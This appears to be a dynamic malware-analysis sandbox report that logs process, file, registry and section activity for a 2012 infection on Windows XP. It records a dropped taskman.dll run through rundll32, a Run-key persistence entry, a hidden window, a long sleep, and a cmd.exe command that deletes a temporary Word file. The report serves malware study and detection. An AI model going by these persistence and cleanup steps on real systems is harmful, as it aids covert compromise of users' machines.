0 0 false 1A8 A013E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 2 4AD13114 ShellExecuteExW
0 0 false 1A8 1, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 2 4AD13114 ShellExecuteExW
HWND Completion Count Source Address Symbol
HWND Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol

Process Token Activites
Status Privilege Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck object name not found 672486663
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions success or wait 672487001
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion object name not found 672487329
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor success or wait 672487657
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar success or wait 672487978
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar success or wait 672488298
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun success or wait 672488618
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DisableUNCCheck object name not found 672489273
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: EnableExtensions success or wait 672489600
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DelayedExpansion object name not found 672489922
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DefaultColor success or wait 672490296
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: CompletionChar success or wait 672490617
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: PathCompletionChar object name not found 672490938
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: AutoRun object name not found 672491255
Memory allocated PID: 1096 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: unknown Protection: page read and write success or wait 672496356
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Personal Type: unicode Data: C:\Documents and Settings\Administrator\My Documents Old data: success or wait 680130177
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0d6ab97b-ade6-11de-bdcc-806d6172696f} Name: BaseClass Type: unicode Data: Drive Old data: success or wait 680238081
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{811e0202-1746-11df-8a4d-806d6172696f} Name: BaseClass Type: unicode Data: Drive Old data: success or wait 680248860
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Documents Type: unicode Data: C:\Documents and Settings\All Users\Documents Old data: success or wait 680302938
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Desktop Type: unicode Data: C:\Documents and Settings\Administrator\Desktop Old data: success or wait 680329163
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Desktop Type: unicode Data: C:\Documents and Settings\All Users\Desktop Old data: success or wait 680340195
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040110900063D11C8EF10054038389C\Usage Name: WORDFiles Type: dword Data: 1089994760 Old data: 1089994759 success or wait 680524516
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: A014E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 747577990
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: A014E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 747578519
Process created PID: 900 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Cmdline: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE /n /dde Createflags: none success or wait 747780139
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: A013E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 755257962
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: A013E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 755258343
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: 1, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 755360819
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1A8 HWNDs: 1, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 755361144

Analysis File: rundll32.exe PID: 760 Parent PID: 1112

General
Start time: 15:20:41
Start date: 24/07/2012
Path: C:\WINDOWS\system32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe C:\Documents and Settings\Administrator\Application Data\taskman.dll start
Imagebase: 0x1000000
File size: 33280 bytes
MD5 hash: 037B1E7798960E0420003D05BB577EE6

File Activites
File Path Access Options Content overwritten Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\IMAGEHLP.dll write and read and execute unknown 76C90000 163840 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 9B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 9B0000 618496 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\taskman.dll read commit 9B0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 9B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 9C0000 262144 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A00000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A00000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A00000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A00000 180224 own pid readonly success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown A00000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A10000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit BC0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit BC0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\WLDAP32.dll write and read and execute unknown 76F60000 180224 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_65536 write unknown BD0000 65536 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_32768 write unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_32768 query and write and read commit BE0000 32768 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 write unknown BF0000 32768 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
\KnownDlls\rtutils.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit C80000 184320 own pid readonly success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown C80000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit CC0000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1
C:\WINDOWS\system32\mscoree.dll write and read and execute commit CC0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\mscoree.dll query and read commit CC0000 299008 own pid readonly success or wait 1
C:\WINDOWS\system32\mscoree.dll write and read and execute commit CC0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\mscoree.dll query and read commit CC0000 299008 own pid readonly success or wait 1
\BaseNamedObjects\Local\UrlZonesSM_Administrator query and write and read commit unknown unknown unknown unknown object name exists 1
\KnownDlls\hnetcfg.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit CE0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
Section loaded by Program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\taskman.dll write and read and execute commit 9B0000 61440 own pid execute success or wait 1 1001792
C:\Documents and Settings\Administrator\Application Data\taskman.dll query and write and read and execute image 10000000 61440 own pid read write success or wait 1 1001792
\KnownDlls\WS2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 1001792
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 1001792
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 1001792
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 1001792
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 10001A80
\KnownDlls\Normaliz.dll write and read and execute unknown A10000 36864 own pid read write conflicting addresses 1 10001A80
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 10001A80
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 10001A80

Registry Activites
Key Path Key Value Name Completion Count Source Address Symbol
Key Value Created
Key Path Name Type Data Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe unicode rundll32.exe "C:\Documents and Settings\Administrator\Application Data\taskman.dll",start success or wait 1 10002781 RegSetValueExA
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings User Agent success or wait 1 10001E58 RegQueryValueExA
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings User Agent success or wait 1 10001E58 RegQueryValueExA

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
PID Process info class Completion Count Source Address Symbol

Thread Activites
Thread Created
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
1524 760 7C8106F9 100025BA C:\WINDOWS\system32\rundll32.exe success or wait 1 10002D6D CreateThread
TID PID Path Completion Count Source Address Symbol
Thread Delayed
TID Delay Completion Count Source Address Symbol
1524 -10800s unknown 1 1000271C Sleep
TID PID Completion Count Source Address Symbol

Memory Activites
PID Filepath Base Length Protection Completion Count Source Address Symbol
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:42 0 1 0
15:20:43 2 4 2
15:20:44 2 5 2
15:20:45 2 5 2
15:21:02 2 5 2
15:21:10 2 5 2
15:21:24 2 5 2

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol

Windows UI Activites
Window Created
Window name Class name HWND Completion Count Source Address Symbol
RunDLL RunDLL B014E success 1 1001412 CreateWindowExW
c0d0so0 c0d0so0 60104 success 1 10002C64 CreateWindowExA
Window UI Shown
HWND Command Completion Count Source Address Symbol
60104 hide error 1 10002C79 NtUserShowWindow
HWND Message LParam WParam Completion Count Source Address Symbol
TID Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Access: write and read and execute Type: commit Baseaddress: 9B0000 Size: 61440 Protection: execute Mapped to pid: own pid success or wait 749972233
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 749976840
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 749985907
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 749989560
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 749999812
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 750001043
Window created Window Name: RunDLL Class Name: RunDLL HWND: B014E success 750034816
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 750338743
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: A10000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 750364848
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 750384422
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 750404878
Thread created PID: 760 TID: 1524 EIP: 7C8106F9 EAX: 100025BA Imagepath: C:\WINDOWS\system32\rundll32.exe success or wait 750604922
Window created Window Name: c0d0so0 Class Name: c0d0so0 HWND: 60104 success 750606022
Window shown HWND: 60104 CMD: hide error 750613264
Key value set Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Name: rundll32.exe Type: unicode Data: rundll32.exe "C:\Documents and Settings\Administrator\Application Data\taskman.dll",start Old data: success or wait 750619089
Key value queried Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings Name: User Agent success or wait 751108231
Key value queried Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings Name: User Agent success or wait 820401265
Thread delayed Time: -10800 TID: 1524 unknown 849042617

Analysis File: cmd.exe PID: 868 Parent PID: 1112

General
Start time: 15:20:41
Start date: 24/07/2012
Path: C:\WINDOWS\system32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp > nul
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C

File Activites
File Opened
File Path Access Options Content overwritten Completion Count Source Address Symbol
nul read attributes and synchronize and generic write synchronous io non alert and non directory file true success or wait 1 4AD02F12 CreateFileW
File Deleted
File Path Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp success or wait 1 4AD17D07 DeleteFileW
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 340000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 490000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 970000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 970000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 440000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 440000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 440000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 970000 618496 own pid readonly success or wait 1

Registry Activites
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor EnableExtensions success or wait 1 4AD04A4F RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DelayedExpansion object name not found 1 4AD04A88 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DefaultColor success or wait 1 4AD04AAD RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor PathCompletionChar success or wait 1 4AD04B37 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor AutoRun success or wait 1 4AD04BB8 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor EnableExtensions success or wait 1 4AD04A4F RegQueryValueExW
